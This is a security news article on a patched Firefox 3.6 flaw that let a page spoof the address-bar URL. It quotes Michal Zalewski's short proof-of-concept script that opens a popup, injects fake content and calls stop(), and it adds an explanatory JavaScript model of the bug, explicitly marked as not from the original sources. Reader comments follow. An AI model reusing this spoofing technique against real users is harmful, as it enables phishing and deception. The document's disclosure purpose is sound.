New Firefox Flaw Enables URL Spoofing, Code Injection

A prominent security researcher has identified a problem with the way that Mozilla Firefox handles links that are opened in a new browser window or tab, enabling attackers to inject arbitrary code into the new window or tab while still keeping a deceptive URL in the browser’s address bar.

The vulnerability, which Mozilla has fixed in the upcoming version 3.6.4 of Firefox, has the effect of tricking users into thinking that they’re visiting a legitimate site while instead sending arbitrary attacker-controlled code to their browsers. Security researcher Michal Zalewski discovered the flaw. There have been a number of other address-bar spoofing vulnerabilities reported in recent years, as researchers and attackers have focused their attention on the intricacies of the browsers’ interactions with Web sites.

Firefox 3.6.4 is currently in beta.

Zalewski has been detailing a series of interesting browser bugs that he’s discovered in recent blog posts, and the Firefox bug is the latest. Here’s his description of how it works:

Alas, this design decision creates an interesting vulnerability in Firefox: the about:blank document actually displayed in that window while the page is loading is considered to be same origin with the opener; the attacker can inject any content there – and still keep his made-up URL in the address bar.

Well, the spinning throbber is there, right? As it turns out, you can make it go away. The harder way is to use a URL that legitimately returns HTTP 204; the easier way is to simply call window.stop():

<input type=submit value="Click me!" onclick="clicked()">
<script>
var w;
function clicked() {
  // Open the target URL in a new window. Until the real page arrives, the
  // window holds an about:blank document that is same-origin with this
  // (the opener) page, while the address bar already shows http://1.2.3.4/.
  w = window.open("http://1.2.3.4/", "_blank", "toolbar=1,menubar=1");
  // After a short delay, write attacker content into that about:blank document,
  // then call stop() so the pending load (and the throbber) goes away while the
  // spoofed URL stays in the address bar.
  setTimeout('w.document.body.innerHTML = "Fake content!";w.stop();', 500);
}
</script>
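
The snippet above relies on two facts that are easy to conflate: the popup's initial about:blank document inherits the opener's origin, and the address bar shows the requested URL before any document from that URL has been committed. The following model, added here as an illustration and not taken from the article, from Zalewski's post or from Mozilla's code, replays the sequence against two address-bar policies so the gap between "URL shown" and "document actually present" is explicit. The function names, the origins attacker.example and other.example, and the hardened policy are assumptions for the example; the policy is not a description of the 3.6.4 fix.

```javascript
// Added example: a model of a popup's state during a pending navigation.
// Not browser code; names, sample origins and the address-bar policies are
// illustrative assumptions.

// Origin as the same-origin policy compares it: scheme://host[:port].
// new URL('about:blank').origin is the opaque origin, serialised as "null".
function originOf(urlString) {
  return new URL(urlString).origin;
}

// window.open() model: the window starts as an about:blank document that
// inherits the opener's origin (standard HTML behaviour), while the requested
// URL is already displayed and a load is pending.
function openPopup(openerUrl, targetUrl) {
  return {
    requestedUrl: targetUrl,
    documentUrl: 'about:blank',
    documentOrigin: originOf(openerUrl),
    loadPending: true,
    body: '',
  };
}

// Script running with origin `scriptOrigin` may touch the popup's DOM only if
// the origins match. The opener passes this check against the initial about:blank.
function canScript(popup, scriptOrigin) {
  return popup.documentOrigin === scriptOrigin;
}

function writeBody(popup, scriptUrl, html) {
  if (!canScript(popup, originOf(scriptUrl))) {
    throw new Error('blocked: ' + originOf(scriptUrl) + ' is not same-origin with the popup');
  }
  popup.body = html;
  return popup;
}

// w.stop(): abandon the pending load. The about:blank document survives.
function stop(popup) {
  popup.loadPending = false;
  return popup;
}

// The target's response commits: new document, new origin, opener loses access.
function commitLoad(popup, html) {
  popup.documentUrl = popup.requestedUrl;
  popup.documentOrigin = originOf(popup.requestedUrl);
  popup.loadPending = false;
  popup.body = html;
  return popup;
}

// Two address-bar policies. The vulnerable one keeps showing the requested URL
// even after the load was stopped; the illustrative hardened one shows the
// requested URL only while a load is actually pending and otherwise shows the
// URL of the document the user is really looking at.
function addressBarVulnerable(popup) {
  return popup.requestedUrl;
}
function addressBarHardened(popup) {
  return popup.loadPending ? popup.requestedUrl : popup.documentUrl;
}

// Replays the quoted snippet (open, inject, stop) under a given policy and
// reports whether the bar and the document disagree once the throbber is gone.
function replayAttack(policy) {
  const popup = openPopup('http://attacker.example/', 'http://1.2.3.4/');
  writeBody(popup, 'http://attacker.example/', 'Fake content!'); // allowed: same origin
  stop(popup);
  const shown = policy(popup);
  return { shown: shown, actual: popup.documentUrl, spoofed: shown !== popup.documentUrl };
}

function demo() {
  return {
    vulnerable: replayAttack(addressBarVulnerable),
    hardened: replayAttack(addressBarHardened),
  };
}
```

Running demo() shows the vulnerable policy displaying http://1.2.3.4/ over an about:blank body the opener wrote, and the hardened policy falling back to about:blank the moment the load is stopped; commitLoad() shows the other half of the story, that once a real document from 1.2.3.4 is committed the opener can no longer script the window at all.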

Zalewski also has discovered and reported other browser bugs in recent months, including one in Apple’s Safari browser. That vulnerability in Safari allowed different pages from different domains to access each other at any time.

Discussion

  • Anonymous on

    I have been using Firefox as browser for about a month now.  I SURE HOPE that Kaspersky is protecting my computer against these "bugs".  I would appreciate any reassurance.

  • Parag Arora on

    This is a cross domain window control. I so want to see Zalewski's test cases now.

  • An Undying Loyal Firefox Fan on

    Thank God Firefox Is always open to constructive advancement and comprehensive analysis...!!! You GO.!!!!  Kaspersky...!!!!

  • Anonymous on

    For over a week now, I've been getting notices, alleged from Mozilla, Firefox OR SOMEONE ANYWAY, claiming that I should allow a 3rd option, where the foreign code will control the option.  BURGLAR -- Ms [1] please just let me in and [2] if you don't like #1, then go to #3 AND [3] says let ANY BURGLAR ++++ CONTROL +++++ ACCESS.

  • Anonymous on

    This isn't something Kaspersky can help you with.  More than likely, an attacker would perform a MITM on you and capture traffic as it's going by.  Then, they would alter the HTTP response packets to include their code.  To the browser and your machine, everything will always appear to be fine because it will just assume the server sent them this information.  The only thing that can help you is yourself.  Surf intelligently and realise when things happen that shouldn't.
